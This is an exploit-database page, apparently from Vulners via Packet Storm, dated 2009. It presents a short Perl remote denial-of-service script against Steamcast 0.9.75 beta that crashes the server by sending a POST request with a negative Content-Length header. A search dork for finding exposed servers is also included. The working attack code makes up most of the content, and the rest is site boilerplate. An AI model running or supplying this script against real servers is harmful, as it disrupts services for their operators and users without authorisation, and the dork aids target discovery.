Lucene search
K

Steamcast 0.9.75b Denial Of Service

🗓️ 14 Apr 2009 00:00:00Reported by ksa04Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 56 Views

Steamcast 0.9.75b Denial Of Service exploi

Code
`#!/usr/bin/perl  
#Steamcast 0.9.75 beta Remote Denial of Service  
#Download :http://www.steamcast.com  
#Tested Under Windows XP and linux  
#Dork for test :"Powered By Steamcast "0.9.75 beta  
#Author: ksa04  
use strict;  
use warnings;  
use IO::Socket;  
  
my $host = shift || die "usage: perl $0 host port\n";  
my $port = shift ;  
  
my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port, PeerProto => 'tcp')  
or die "error: $!\n";  
  
$sock->send("POST / HTTP/1.1\r\n");  
$sock->send("Content-Length: -100\r\n\r\n");  
  
  
$sock->close;  
  
print "[+]Done...\n";  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Apr 2009 00:00Current
0.1Low risk
Vulners AI Score0.1
56